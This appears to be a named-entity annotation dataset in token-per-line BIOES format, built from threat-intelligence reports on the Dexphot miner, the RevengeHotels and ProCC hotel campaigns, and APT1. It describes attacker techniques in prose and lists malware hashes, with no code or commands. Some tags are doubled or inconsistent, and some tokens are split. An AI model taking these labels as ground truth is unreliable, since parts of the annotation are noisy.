hardcoded O
task O
names O
will O
not O
be O
effective O
in O
preventing O
them O
from O
running O
. O

The O
names O
are O
usually O
in O
a O
GUID O
format O
, O
although O
after O
we O
released O
our O
first O
round O
of O
Dexphot-blocking O
protections O
, O
the O
threat O
authors O
began O
to O
use O
random O
strings O
. O

The O
threat O
authors O
have O
one O
more O
evasion O
technique O
for O
these O
scheduled O
tasks O
: O
some O
Dexphot S-MAL
variants O
copy O
msiexec.exe S-FILE
to O
an O
arbitrary O
location O
and O
give O
it O
a O
random O
name O
, O
such O
as O
%AppData%\<random>.exe S-FILE
. O

This O
makes O
the O
system O
process O
running O
malicious O
code O
a O
literal O
moving O
target O
. O

Dexphot S-MAL
exhibits O
multiple O
layers O
of O
polymorphism O
across O
the O
binaries O
it O
distributes O
. O

For O
example O
, O
the O
MSI S-TOOL
package O
used O
in O
the O
campaign O
contains O
different O
files O
, O
as O
shown O
in O
the O
table O
below O
. O

The O
MSI S-TOOL
packages O
generally O
include O
a O
clean O
version O
of O
unzIP S-TOOL
. O

exe S-FILE
, O
a O
password-protected O
ZIP O
file O
, O
and O
a O
batch O
file O
that O
checks O
for O
currently O
installed O
antivirus O
products O
. O

However O
, O
the O
batch O
file O
is O
not O
always O
present O
, O
and O
the O
names O
of O
the O
ZIP O
files O
and O
Loader B-TOOL
DLLs E-TOOL
, O
as O
well O
as O
the O
password O
for O
extracting O
the O
ZIP O
file O
, O
all O
change O
from O
one O
package O
to O
the O
next O
. O

In O
addition O
, O
the O
contents O
of O
each O
Loader B-TOOL
DLL E-TOOL S-TOOL
differs O
from O
package O
to O
package O
, O
as O
does O
the O
encrypted O
data O
included O
in O
the O
ZIP O
file O
. O

This O
leads O
to O
the O
generation O
of O
a O
different O
ZIP B-TOOL
archive E-TOOL
and O
, O
in O
turn O
, O
a O
unique O
MSI S-TOOL
package O
, O
each O
time O
the O
attacker O
bundles O
the O
files O
together O
. O

Because O
of O
these O
carefully O
designed O
layers O
of O
polymorphism O
, O
a O
traditional O
file-based O
detection O
approach O
wouldn’t O
be O
effective O
against O
Dexphot S-MAL
. O

Besides O
tracking O
the O
files O
and O
processes O
that O
Dexphot S-MAL
uses O
to O
execute O
an O
attack O
, O
we O
have O
also O
been O
monitoring O
the O
domains O
used O
to O
host O
malicious O
payloads O
. O

The O
URLs O
used O
for O
hosting O
all O
follow O
a O
similar O
pattern O
. O

The O
domain O
address O
usually O
ends O
in O
a O
.info S-DOM
or O
.net S-DOM
TLD O
, O
while O
the O
file O
name O
for O
the O
actual O
payload O
consists O
of O
random O
characters O
, O
similar O
to O
the O
randomness O
previously O
seen O
being O
used O
to O
generate O
file O
names O
and O
scheduled O
tasks O
. O

Many O
of O
the O
URLs O
listed O
were O
in O
use O
for O
an O
extended O
period O
. O

However O
, O
the O
MSI S-TOOL
packages O
hosted O
at O
each O
URL O
are O
frequently O
changed O
or O
updated O
. O

In O
addition O
, O
every O
few O
days O
more O
domains O
are O
generated O
to O
host O
more O
payloads O
. O

After O
a O
few O
months O
of O
monitoring O
, O
we O
were O
able O
to O
identify O
around O
200 O
unique O
Dexphot S-MAL
domains O
. O

Dexphot S-MAL
is O
not O
the O
type O
of O
attack O
that O
generates O
mainstream O
media O
attention O
; O
it O
’s O
one O
of O
the O
countless O
malware O
campaigns O
that O
are O
active O
at O
any O
given O
time O
. O

Its O
goal O
is O
a O
very O
common O
one O
in O
cybercriminal O
circles O
— O
to O
install O
a O
coin O
miner O
that O
silently O
steals O
computer O
resources O
and O
generates O
revenue O
for O
the O
attackers O
— O
yet O
Dexphot S-MAL
exemplifies O
the O
level O
of O
complexity O
and O
rate O
of O
evolution O
of O
even O
everyday O
threats O
, O
intent O
on O
evading O
protections O
and O
motivated O
to O
fly O
under O
the O
radar O
for O
the O
prospect O
of O
profit O
. O

To O
combat O
threats O
, O
several O
next-generation O
protection O
engines O
in O
Microsoft B-TOOL
Defender I-TOOL
Advanced I-TOOL
Threat I-TOOL
Protection E-TOOL
’s O
antivirus B-TOOL
component E-TOOL
detect O
and O
stop O
malicious O
techniques O
at O
multiple O
points O
along O
the O
attack O
chain O
. O

For O
Dexphot S-MAL
, O
machine O
learning-based O
detections O
in O
the O
cloud O
recognize O
and O
block O
the O
DLLs S-TOOL
loaded O
by O
rundll32.exe S-FILE
, O
stopping O
the O
attack O
chain O
in O
its O
early O
stages O
. O

Memory O
scans O
detect O
and O
terminate O
the O
loading O
of O
malicious O
code O
hidden O
by O
process B-TOOL
hollowing E-TOOL
— O
including O
the O
monitoring O
processes O
that O
attempt O
to O
update O
the O
malware O
code O
and O
re-infect O
the O
machine O
via O
PowerShell S-TOOL
commands O
. O

Behavioral O
blocking O
and O
containment O
capabilities O
are O
especially O
effective O
in O
defeating O
Dexphot S-MAL
’s O
fileless O
techniques O
, O
detection O
evasion O
, O
and O
persistence O
mechanisms O
, O
including O
the O
periodic O
and O
boot-time O
attempts O
to O
update O
the O
malware O
via O
scheduled O
tasks O
. O

As O
mentioned O
, O
given O
the O
complexity O
of O
the O
attack O
chain O
and O
of O
Dexphot S-MAL
’s O
persistence O
methods O
, O
we O
released O
a O
remediation O
solution O
that O
prevents O
re-infection O
by O
removing O
artifacts O
. O

The O
detection O
, O
blocking O
, O
and O
remediation O
of O
Dexphot S-MAL
on O
endpoints O
are O
exposed O
in O
Microsoft B-TOOL
Defender I-TOOL
Security I-TOOL
Center E-TOOL
, O
where O
Microsoft B-TOOL
Defender I-TOOL
ATP E-TOOL
’s O
rich O
capabilities O
like O
endpoint O
detection O
and O
response O
, O
automated O
investigation O
and O
remediation O
, O
and O
others O
enable O
security O
operations O
teams O
to O
investigate O
and O
remediate O
attacks O
in O
enterprise O
environments O
. O

With O
these O
capabilities O
, O
Microsoft B-TOOL
Defender I-TOOL
ATP E-TOOL
provides O
comprehensive O
protection O
against O
Dexphot S-MAL
and O
the O
countless O
other O
complex O
and O
evolving O
threats O
that O
we O
face O
every O
day O
. O

Dexphot S-MAL
: O
72acaf9ff8a43c68416884a3fff3b23e749b4bb8fb39e16f9976643360ed391f S-SHA2
. O

Dexphot S-MAL
: O
22beffb61cbdc2e0c3eefaf068b498b63a193b239500dab25d03790c467379e3 S-SHA2
. O

Dexphot S-MAL
: O
65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a S-SHA2
. O

Dexphot S-MAL
: O
ba9467e0d63ba65bf10650a3c8d36cd292b3f846983032a44a835e5966bc7e88 S-SHA2
. O

Dexphot S-MAL
: O
537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e S-SHA2
. O

Dexphot S-MAL
: O
504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 S-SHA2
. O

Dexphot S-MAL
: O
aa5c56fe01af091f07c56ac7cbd240948ea6482b6146e0d3848d450977dff152 S-SHA2
. O


RevengeHotels S-APT
: O
cybercrime O
targeting O
hotel O
front O
desks O
worldwide O
. O

RevengeHotels S-APT
is O
a O
targeted O
cybercrime O
malware O
campaign O
against O
hotels O
, O
hostels O
, O
hospitality O
and O
tourism O
companies O
, O
mainly O
, O
but O
not O
exclusively O
, O
located O
in O
Brazil S-LOC
. O

We O
have O
confirmed O
more O
than O
20 O
hotels O
that O
are O
victims O
of O
the O
group O
, O
located O
in O
eight O
states O
in O
Brazil S-LOC
, O
but O
also O
in O
other O
countries O
such O
as O
Argentina S-LOC
, O
Bolivia S-LOC
, O
Chile S-LOC
, O
Costa B-LOC
Rica E-LOC
, O
France S-LOC
, O
Italy S-LOC
, O
Mexico S-LOC
, O
Portugal S-LOC
, O
Spain S-LOC
, O
Thailand S-LOC
and O
Turkey S-LOC
. O

The O
goal O
of O
the O
campaign O
is O
to O
capture O
credit O
card O
data O
from O
guests O
and O
travelers O
stored O
in O
hotel O
systems O
, O
as O
well O
as O
credit O
card O
data O
received O
from O
popular O
online B-IDTY
travel I-IDTY
agencies E-IDTY
( O
OTAs S-IDTY
) O
such O
as O
Booking.com S-DOM
. O

The O
main O
attack O
vector O
is O
via O
email B-ACT
with I-ACT
crafted I-ACT
Word I-ACT
, I-ACT
Excel I-ACT
or I-ACT
PDF I-ACT
documents I-ACT
attached E-ACT
. O

Some O
of O
them O
exploit O
CVE-2017-0199 S-VULID
, O
loading O
it O
using O
VBS O
and O
PowerShell S-TOOL
scripts O
and O
then O
installing O
customized O
versions O
of O
RevengeRAT S-MAL
, O
NjRAT S-MAL
, O
NanoCoreRAT S-MAL
, O
888 B-MAL
RAT E-MAL
and O
other O
custom O
malware O
such O
as O
ProCC S-MAL
in O
the O
victim O
’s O
machine O
. O

The O
group O
has O
been O
active O
since O
2015 S-TIME
, O
but O
increased O
its O
attacks O
in O
2019 S-TIME
. O

In O
our O
research O
, O
we O
were O
also O
able O
to O
track O
two O
groups O
targeting O
the O
hospitality O
sector O
, O
using O
separate O
but O
similar O
infrastructure O
, O
tools O
and O
techniques O
. O

PaloAlto S-IDTY
has O
already O
written O
about O
one O
of O
them O
. O

We O
named O
the O
first O
group O
RevengeHotels S-APT
, O
and O
the O
second O
ProCC S-APT
. O

These O
groups O
use O
a O
lot O
of O
social O
engineering O
in O
their O
attacks O
, O
asking O
for O
a O
quote O
from O
what O
appears O
to O
be O
a O
government O
entity O
or O
private O
company O
wanting O
to O
make O
a O
reservation O
for O
a O
large O
number O
of O
people O
. O

Their O
infrastructure O
also O
relies O
on O
the O
use O
of O
dynamic O
DNS S-PROT
services O
pointing O
to O
commercial O
hosting O
and O
self-hosted O
servers O
. O

They O
also O
sell O
credentials O
from O
the O
affected O
systems O
, O
allowing O
other O
cybercriminals O
to O
have O
remote O
access O
to O
hotel O
front O
desks O
infected O
by O
the O
campaign O
. O

We O
monitored O
the O
activities O
of O
these O
groups O
and O
the O
new O
malware O
they O
are O
creating O
for O
over O
a O
year O
. O

With O
a O
high O
degree O
of O
confidence O
, O
we O
can O
confirm O
that O
at O
least O
two O
distinct O
groups O
are O
focused O
on O
attacking O
this O
sector O
; O
there O
is O
also O
a O
third O
group O
, O
though O
it O
is O
unclear O
if O
its O
focus O
is O
solely O
on O
this O
sector O
or O
if O
carries O
out O
other O
types O
of O
attacks O
. O

One O
of O
the O
tactics O
used O
in O
operations O
by O
these O
groups O
is O
highly O
targeted O
spear-phishing B-ACT
messages E-ACT
. O

They O
register O
typo-squatting O
domains O
, O
impersonating O
legitimate O
companies O
. O

The O
emails S-TOOL
are O
well O
written O
, O
with O
an O
abundance O
of O
detail O
. O

They O
explain O
why O
the O
company O
has O
chosen O
to O
book O
that O
particular O
hotel O
. O

By O
checking O
the O
sender O
information O
, O
it O
’s O
possible O
to O
determine O
whether O
the O
company O
actually O
exists O
. O

However O
, O
there O
is O
a O
small O
difference O
between O
the O
domain O
used O
to O
send O
the O
email S-TOOL
and O
the O
real O
one O
. O

This O
spear-phishing S-ACT
message O
, O
written O
in O
Portuguese O
, O
has O
a O
malicious O
file O
attached O
misusing O
the O
name O
of O
a O
real O
attorney O
office O
, O
while O
the O
domain O
sender O
of O
the O
message O
was O
registered O
one O
day O
before O
, O
using O
a O
typo-squatting O
domain O
. O

The O
group O
goes O
further O
in O
its O
social O
engineering O
effort O
: O
to O
convince O
the O
hotel O
personnel O
about O
the O
legitimacy O
of O
their O
request O
, O
a O
copy O
of O
the O
National O
Registry O
of O
Legal O
Entities O
card O
( O
CNPJ O
) O
is O
attached O
to O
the O
quotation O
. O

The O
attached O
file O
, O
Reserva B-FILE
Advogados I-FILE
Associados.docx E-FILE
( O
Attorneys B-FILE
Associates I-FILE
Reservation.docx E-FILE
) O
, O
is O
a O
malicious O
Word O
file O
that O
drops O
a O
remote O
OLE S-TOOL
object O
via O
template O
injection O
to O
execute O
macro O
code O
. O

The O
macro O
code O
inside O
the O
remote O
OLE S-TOOL
document O
contains O
PowerShell S-TOOL
commands O
that O
download O
and O
execute O
the O
final O
payload O
. O

In O
the O
RevengeHotels S-APT
campaign O
, O
the O
downloaded O
files O
are O
.NET S-FILE
binaries O
protected O
with O
the O
Yoda B-MAL
Obfuscator E-MAL
. O

After O
unpacking O
them O
, O
the O
code O
is O
recognizable O
as O
the O
commercial O
RAT S-MAL
RevengeRAT S-MAL
. O

An O
additional O
module O
written O
by O
the O
group O
called O
ScreenBooking S-MAL
is O
used O
to O
capture O
credit O
card O
data O
. O

It O
monitors O
whether O
the O
user O
is O
browsing O
the O
web O
page O
. O

In O
the O
initial O
versions O
, O
back O
in O
2016 S-TIME
, O
the O
downloaded O
files O
from O
RevengeHotels S-APT
campaigns O
were O
divided O
into O
two O
modules O
: O
a O
backdoor S-MAL
and O
a O
module O
to O
capture O
screenshots O
. O

Recently O
we O
noticed O
that O
these O
modules O
had O
been O
merged O
into O
a O
single O
backdoor O
module O
able O
to O
collect O
data O
from O
clipboard O
and O
capture O
screenshots O
. O

In O
this O
example O
, O
the O
webpage O
that O
the O
attacker O
is O
monitoring O
is O
booking.com S-DOM
( O
more O
specifically O
, O
the O
page O
containing O
the O
card O
details O
) O
. O

The O
code O
is O
specifically O
looking O
for O
data O
in O
Portuguese O
and O
English O
, O
allowing O
the O
attackers O
to O
steal O
credit O
card O
data O
from O
web O
pages O
written O
in O
these O
languages O
. O

In O
the O
ProCC S-APT
campaigns O
, O
the O
downloaded O
files O
are O
Delphi S-TOOL
binaries O
. O

The O
backdoor S-MAL
installed O
in O
the O
machine O
is O
more O
customized O
than O
that O
used O
by O
RevengeHotels S-APT
: O
it O
’s O
developed O
from O
scratch O
and O
is O
able O
to O
collect O
data O
from O
the O
clipboard O
and O
printer O
spooler O
, O
and O
capture O
screenshots O
. O

Because O
the O
personnel O
in O
charge O
of O
confirming O
reservations O
usually O
need O
to O
pull O
credit O
card O
data O
from O
OTA B-TOOL
websites E-TOOL
, O
it O
’s O
possible O
to O
collect O
card O
numbers O
by O
monitoring O
the O
clipboard O
and O
the O
documents O
sent O
to O
the O
printer O
. O

According O
to O
the O
relevant O
underground O
forums O
and O
messaging O
groups O
, O
these O
criminals O
also O
infect O
front O
desk O
machines O
in O
order O
to O
capture O
credentials O
from O
the O
hotel O
administration O
software O
; O
they O
can O
then O
steal O
credit O
card O
details O
from O
it O
too O
. O

Some O
criminals O
also O
sell O
remote O
access O
to O
these O
systems O
, O
acting O
as O
a O
concierge O
for O
other O
cybercriminals O
by O
giving O
them O
permanent O
access O
to O
steal O
new O
data O
by O
themselves O
. O

Some O
Brazilian B-APT
criminals E-APT
tout O
credit O
card O
data O
extracted O
from O
a O
hotel O
’s O
system O
as O
high O
quality O
and O
reliable O
because O
it O
was O
extracted B-ACT
from I-ACT
a I-ACT
trusted I-ACT
source I-ACT
, I-ACT
i.e. I-ACT
, I-ACT
a I-ACT
hotel I-ACT
administration I-ACT
system E-ACT
. O

The O
majority O
of O
the O
victims O
are O
associated O
with O
the O
hospitality O
sector O
. O

Based O
on O
the O
routines O
used O
, O
we O
estimate O
that O
this O
attack O
has O
a O
global O
reach O
. O

Based O
on O
data O
extracted O
from O
Bit.ly S-DOM
statistics O
, O
we O
can O
see O
that O
potential O
victims O
from O
many O
other O
countries O
have O
at O
least O
accessed O
the O
malicious O
link O
. O

This O
data O
suggests O
that O
the O
number O
of O
countries O
with O
potential O
victims O
is O
higher O
than O
our O
telemetry O
has O
registered O
. O

RevengeHotels S-APT
is O
a O
campaign O
that O
has O
been O
active O
since O
at O
least O
2015 S-TIME
, O
revealing O
different O
groups O
using O
traditional O
RAT S-MAL
malware O
to O
infect O
businesses O
in O
the O
hospitality O
sector O
. O

While O
there O
is O
a O
marked O
interest O
in O
Brazilian O
victims O
, O
our O
telemetry O
shows O
that O
their O
reach O
has O
extended O
to O
other O
countries O
in O
Latin B-LOC
America E-LOC
and O
beyond O
. O

The O
use O
of O
spear-phishing B-ACT
emails E-ACT
, O
malicious O
documents O
and O
RAT S-MAL
malware O
is O
yielding O
significant O
results O
for O
at O
least O
two O
groups O
we O
have O
identified O
in O
this O
campaign O
. O

Other O
threat O
actors O
may O
also O
be O
part O
of O
this O
wave O
of O
attacks O
, O
though O
there O
is O
no O
confirmation O
at O
the O
current O
time O
. O

If O
you O
want O
to O
be O
a O
savvy O
and O
safe O
traveler O
, O
it O
’s O
highly O
recommended O
to O
use O
a O
virtual O
payment O
card O
for O
reservations O
made O
via O
OTAs S-TOOL
, O
as O
these O
cards O
normally O
expire O
after O
one O
charge O
. O

While O
paying O
for O
your O
reservation O
or O
checking O
out O
at O
a O
hotel O
, O
it O
’s O
a O
good O
idea O
to O
use O
a O
virtual O
wallet O
such O
as O
Apple B-TOOL
Pay E-TOOL
, O
Google B-TOOL
Pay E-TOOL
, O
etc O
. O

RevengeHotels S-APT
: O
74440d5d0e6ae9b9a03d06dd61718f66 S-MD5
. O

RevengeHotels S-APT
: O
e675bdf6557350a02f15c14f386fcc47 S-MD5
. O

RevengeHotels S-APT
: O
df632e25c32e8f8ad75ed3c50dd1cd47 S-MD5
. O

RevengeHotels S-APT
: O
a089efd7dd9180f9b726594bb6cf81ae S-MD5
. O

RevengeHotels S-APT
: O
81701c891a1766c51c74bcfaf285854b S-MD5
. O

APT1 S-APT
. O

Since O
2004 S-TIME
, O
Mandiant S-SECTEAM
has O
investigated O
computer O
security O
breaches O
at O
hundreds O
of O
organizations O
around O
the O
world.The O
majority O
of O
these O
security O
breaches O
are O
attributed O
to O
advanced O
threat O
actors O
referred O
to O
as O
the O
“ O
Advanced O
Persistent O
Threat O
” O
( O
APT O
) O
. O

We O
first O
published O
details O
about O
the O
APT O
in O
our O
January B-TIME
2010 E-TIME
M-Trends S-IDTY
report O
. O

As O
we O
stated O
in O
there O
port O
, O
our O
position O
was O
that O
“ O
The O
Chinese O
government O
may O
authorize O
this O
activity O
, O
but O
there O
’s O
no O
way O
to O
determine O
the O
extent O
of O
its O
involvement. O
” O
Now O
, O
three O
years O
later O
, O
we O
have O
the O
evidence O
required O
to O
change O
our O
assessment O
. O

The O
details O
we O
have O
analyzed O
during O
hundreds O
of O
investigations O
convince O
us O
that O
the O
groups O
conducting O
these O
activities O
are O
based O
primarily O
in O
China S-LOC
and O
that O
the O
Chinese O
Government O
is O
aware O
of O
them O
. O

Mandiant S-SECTEAM
continues O
to O
track O
dozens O
of O
APT O
groups O
around O
the O
world O
; O
however O
, O
this O
report O
is O
focused O
on O
the O
most O
prolific O
of O
these O
groups O
. O

We O
refer O
to O
this O
group O
as O
“ O
APT1 S-APT
” O
and O
it O
is O
one O
of O
more O
than O
20 O
APT O
groups O
with O
origins O
inChina S-LOC
. O

APT1 S-APT
is O
a O
single O
organization O
of O
operators O
that O
has O
conducted O
a O
cyber B-ACT
espionage E-ACT
campaign O
against O
a O
broad O
range O
of O
victims O
since O
at O
least O
2006 S-TIME
. O

From O
our O
observations O
, O
it O
is O
one O
of O
the O
most O
prolific O
cyber B-ACT
espionage E-ACT
groups O
in O
terms O
of O
the O
sheer O
quantity O
of O
information O
stolen O
. O

The O
scale O
and O
impact O
of O
APT1 S-APT
’s O
operations O
compelled O
us O
to O
write O
this O
report O
. O

The O
activity O
we O
have O
directly O
observed O
likely O
represents O
only O
a O
small O
fraction O
of O
the O
cyber B-ACT
espionage E-ACT
that O
APT1 S-APT
has O
conducted O
. O

Though O
our O
visibility O
of O
APT1 S-APT
’s O
activities O
is O
incomplete O
, O
we O
have O
analyzed O
the O
group O
’s O
intrusions O
against O
nearly O
150 O
victims O
over O
seven O
years O
. O

From O
our O
unique O
vantage O
point O
responding O
to O
victims O
, O
we O
tracked O
APT1 S-APT
back O
to O
four O
large O
networks O
in O
Shanghai S-LOC
, O
two O
of O
which O
are O
allocated O
directly O
to O
the O
Pudong B-LOC
New I-LOC
Area E-LOC
. O

We O
uncovered O
a O
substantial O
amount O
of O
APT1 S-APT
’s O
attack O
infrastructure O
, O
command O
and O
control O
, O
and O
modus O
operandi O
( O
tools O
, O
tactics O
, O
and O
procedures O
) O
. O

In O
an O
effort O
to O
underscore O
there O
are O
actual O
individuals O
behind O
the O
keyboard O
, O
Mandiant S-SECTEAM
is O
revealing O
three O
personas O
we O
have O
attributed O
to O
APT1 S-APT
. O

These O
operators O
, O
like O
soldiers O
, O
may O
merely O
be O
following O
orders O
given O
to O
them O
by O
others O
. O

Our O
analysis O
has O
led O
us O
to O
conclude O
that O
APT1 S-APT
is O
likely O
government-sponsored O
and O
one O
of O
the O
most O
persistent O
of O
China S-LOC
’s O
cyber O
threat O
actors O
. O

We O
believe O
that O
APT1 S-APT
is O
able O
to O
wage O
such O
a O
long-running O
and O
extensive O
cyber B-ACT
espionage E-ACT
campaign O
in O
large O
part O
because O
it O
receives O
direct O
government O
support O
. O

In O
seeking O
to O
identify O
the O
organization O
behind O
this O
activity O
,our O
research O
found O
that O
People B-IDTY
’s I-IDTY
Liberation I-IDTY
Army E-IDTY
( O
PLA S-IDTY
’s O
) O
Unit B-IDTY
61398 E-IDTY
is O
similar O
to O
APT1 S-APT
in O
its O
mission O
, O
capabilities O
, O
and O
resources O
. O

PLA S-IDTY
Unit B-IDTY
61398 E-IDTY
is O
also O
located O
in O
precisely O
the O
same O
area O
from O
which O
APT1 S-APT
activity O
appears O
to O
originate O
. O

APT1 S-APT
is O
believed O
to O
be O
the O
2nd O
Bureau B-IDTY
of I-IDTY
the I-IDTY
People I-IDTY
’s I-IDTY
Liberation I-IDTY
Army E-IDTY
( O
PLA S-IDTY
) O
General B-IDTY
Staff I-IDTY
Department E-IDTY
’s O
( O
GSD S-IDTY
) O
3rd O
Department O
, O
which O
is O
most O
commonly O
known O
by O
its O
Military B-IDTY
Unit I-IDTY
Cover I-IDTY
Designator E-IDTY
( O
MUCD S-IDTY
) O
as O
Unit B-IDTY
61398 E-IDTY
. O

The O
nature O
of O
“ O
Unit B-IDTY
61398 E-IDTY
’s O
” O
work O
is O
considered O
by O
China S-LOC
to O
be O
a O
state O
secret O
; O
however O
, O
we O
believe O
it O
engages O
in O
harmful O
“ O
Computer O
Network O
Operations. O
” O
Unit B-IDTY
61398 E-IDTY
is O
partially O
situated O
on O
Datong B-LOC
Road E-LOC
in O
Gaoqiaozhen S-LOC
, O
which O
is O
located O
in O
the O
Pudong B-LOC
New I-LOC
Area E-LOC
of O
Shanghai S-LOC
. O

The O
central O
building O
in O
this O
compound O
is O
a O
130,663 O
square O
foot O
facility O
that O
is O
12 O
stories O
high O
and O
was O
built O
in O
early O
2007 S-TIME
. O

APT1 S-APT
has O
systematically O
stolen O
hundreds O
of O
terabytes O
of O
data O
from O
at O
least O
141 O
organizations O
, O
and O
has O
demonstrated O
the O
capability O
and O
intent O
to O
steal O
from O
dozens O
of O
organizations O
simultaneously O
. O

Since O
2006 S-TIME
, O
Mandiant S-SECTEAM
has O
observed O
APT1 S-APT
compromise O
141 O
companies O
spanning O
20 O
major O
industries O
. O

APT1 S-APT
has O
a O
well-defined O
attack O
methodology O
, O
honed O
over O
years O
and O
designed O
to O
steal O
large O
volumes O
of O
valuable O
intellectual O
property O
. O

Once O
APT1 S-APT
has O
established O
access O
, O
they O
periodically O
revisit O
the O
victim O
’s O
network O
over O
several O
months O
or O
years O
and O
steal O
broad O
categories O
of O
intellectual O
property O
, O
including O
technology O
blueprints O
, O
proprietary O
manufacturing O
processes O
, O
test O
results O
, O
business O
plans O
, O
pricing O
documents O
, O
partnership O
agreements O
, O
and O
emails S-TOOL
and O
contact O
lists O
from O
victim O
organizations O
’ O
leadership O
. O

APT1 S-APT
uses O
some O
tools O
and O
techniques O
that O
we O
have O
not O
yet O
observed O
being O
used O
by O
other O
groups O
including O
two O
utilities O
designed O
to O
steal O
email S-TOOL
— O
GETMAIL S-MAL
and O
MAPIGET S-MAL
. O

Establishing O
a O
foothold O
involves O
actions O
that O
ensure O
control O
of O
the O
target O
network O
’s O
systems O
from O
outside O
the O
network O
. O

APT1 S-APT
establishes O
a O
foothold O
once O
email S-TOOL
recipients O
open O
a O
malicious O
file O
and O
a O
backdoor O
is O
subsequently O
installed O
. O

A O
backdoor O
is O
software O
that O
allows O
an O
intruder O
to O
send O
commands O
to O
the O
system O
remotely O
. O

In O
almost O
every O
case O
, O
APT O
backdoors O
initiate O
outbound O
connections O
to O
the O
intruder O
’s O
“ O
command O
and O
control O
” O
( O
C2 S-TOOL
) O
server O
. O

APT O
intruders O
employ O
this O
tactic O
because O
while O
network O
firewalls O
are O
generally O
adept O
at O
keeping O
malware O
outside O
the O
network O
from O
initiating O
communication O
with O
systems O
inside O
the O
network O
, O
they O
are O
less O
reliable O
at O
keeping O
malware O
that O
is O
already O
inside O
the O
network O
from O
communicating O
to O
systems O
outside O
. O

While O
APT1 S-APT
intruders O
occasionally O
use O
publicly O
available O
backdoors O
such O
as O
Poison B-MAL
Ivy E-MAL
and O
Gh0st B-MAL
RAT E-MAL
, O
the O
vast O
majority O
of O
the O
time O
they O
use O
what O
appear O
to O
be O
their O
own O
custom O
backdoors O
. O

We O
will O
describe O
APT1 S-APT
’s O
backdoors O
in O
two O
categories O
: O
“ O
Beachhead O
Backdoors O
” O
and O
“ O
Standard O
Backdoors. O
” O

Beachhead O
backdoors O
are O
typically O
minimally O
featured O
. O

They O
offer O
the O
attacker O
a O
toe-hold O
to O
perform O
simple O
tasks O
like O
retrieve O
files O
, O
gather O
basic O
system O
information O
and O
trigger O
the O
execution O
of O
other O
more O
significant O
capabilities O
such O
as O
a O
standard O
backdoor O
. O

APT1 S-APT
’s O
beachhead O
backdoors O
are O
usually O
what O
we O
call O
WEBC2 B-MAL
backdoors E-MAL
. O

WEBC2 B-MAL
backdoors E-MAL
are O
probably O
the O
most O
well-known O
kind O
of O
APT1 S-APT
backdoor O
, O
and O
are O
the O
reason O
why O
some O
security O
companies O
refer O
to O
APT1 S-APT
as O
the O
“ O
Comment O
Crew. O
” O
A O
WEBC2 B-MAL
backdoor E-MAL
is O
designed O
to O
retrieve O
a O
webpage O
from O
a O
C2 S-TOOL
server O
. O

It O
expects O
the O
webpage O
to O
contain O
special O
HTML S-TOOL
tags O
; O
the O
backdoor O
will O
attempt O
to O
interpret O
the O
data O
between O
the O
tags O
as O
commands O
. O

Older O
versions O
of O
WEBC2 S-MAL
read O
data O
between O
HTML S-TOOL
comments O
, O
though O
over O
time O
WEBC2 S-MAL
variants O
have O
evolved O
to O
read O
data O
contained O
within O
other O
types O
of O
tags O
. O

From O
direct O
observation O
, O
we O
can O
confirm O
that O
APT1 S-APT
was O
using O
WEBC2 B-MAL
backdoors E-MAL
as O
early O
as O
July B-TIME
2006 E-TIME
. O

However O
, O
the O
first O
compile O
time35 O
we O
have O
for O
WEBC2 S-MAL
is O
2004-01-23 S-TIME
, O
suggesting O
that O
APT1 S-APT
has O
been O
crafting O
WEBC2 B-MAL
backdoors E-MAL
since O
early O
2004 S-TIME
. O

Based O
on O
the O
400+ O
samples O
of O
WEBC2 S-MAL
variants O
that O
we O
have O
accumulated O
, O
it O
appears O
that O
APT1 S-APT
has O
direct O
access O
to O
developers O
who O
have O
continually O
released O
new O
WEBC2 S-MAL
variants O
for O
over O
six O
years O
. O

WEBC2 B-MAL
backdoors E-MAL
are O
often O
packaged O
with O
spear B-ACT
phishing E-ACT
emails S-TOOL
. O

Once O
installed O
, O
APT1 S-APT
intruders O
have O
the O
option O
to O
tell O
victim O
systems O
to O
download O
and O
execute O
additional O
malicious O
software O
of O
their O
choice O
. O

WEBC2 B-MAL
backdoors E-MAL
work O
for O
their O
intended O
purpose O
, O
but O
they O
generally O
have O
fewer O
features O
than O
the O
“ O
Standard O
Backdoors O
” O
described O
below O
. O

The O
standard O
, O
non-WEBC2 S-MAL
APT1 S-APT
backdoor O
typically O
communicates O
using O
the O
HTTP S-PROT
protocol O
( O
to O
blend O
in O
with O
legitimate O
web O
traffic O
) O
or O
a O
custom O
protocol O
that O
the O
malware O
authors O
designed O
themselves O
. O

These O
backdoors O
give O
APT O
intruders O
a O
laundry O
list O
of O
ways O
to O
control O
victim O
systems O
. O

The O
BISCUIT B-MAL
backdoor E-MAL
( O
so O
named O
for O
the O
command O
“ O
bdkzt S-MAL
” O
) O
is O
an O
illustrative O
example O
of O
the O
range O
of O
commands O
that O
APT1 S-APT
has O
built O
into O
its O
“ O
standard O
” O
backdoors O
. O

APT1 S-APT
has O
used O
and O
steadily O
modified O
BISCUIT S-MAL
since O
as O
early O
as O
2007 O
and O
continues O
to O
use O
it O
presently O
. O

Some O
APT O
backdoors O
attempt O
to O
mimic O
legitimate O
Internet O
traffic O
other O
than O
the O
HTTP S-PROT
protocol O
. O

When O
network O
defenders O
see O
the O
communications O
between O
these O
backdoors O
and O
their O
C2 S-TOOL
servers O
, O
they O
might O
easily O
dismiss O
them O
as O
legitimate O
network O
traffic O
. O


APT1 S-APT
. O

APT1 S-APT
maintains O
an O
extensive O
infrastructure O
of O
computers O
around O
the O
world O
. O

We O
have O
evidence O
suggesting O
that O
APT1 S-APT
manually O
controls O
thousands O
of O
systems O
in O
support O
of O
their O
attacks O
, O
and O
have O
directly O
observed O
their O
control O
over O
hundreds O
of O
these O
systems O
. O

Although O
they O
control O
systems O
in O
dozens O
of O
countries O
, O
their O
attacks O
originate O
from O
four O
large O
networks O
in O
Shanghai S-LOC
— O
two O
of O
which O
are O
allocated O
directly O
to O
the O
Pudong B-LOC
New I-LOC
Area E-LOC
, O
the O
home O
of O
Unit B-IDTY
61398 E-IDTY
. O

The O
sheer O
number O
of O
APT1 S-APT
IP O
addresses O
concentrated O
in O
these O
Shanghai S-LOC
ranges O
, O
coupled O
with O
Simplified B-TOOL
Chinese I-TOOL
keyboard E-TOOL
layout O
settings O
on O
APT1 S-APT
’s O
attack O
systems O
, O
betrays O
the O
true O
location O
and O
language O
of O
the O
operators O
. O

To O
help O
manage O
the O
vast O
number O
of O
systems O
they O
control O
, O
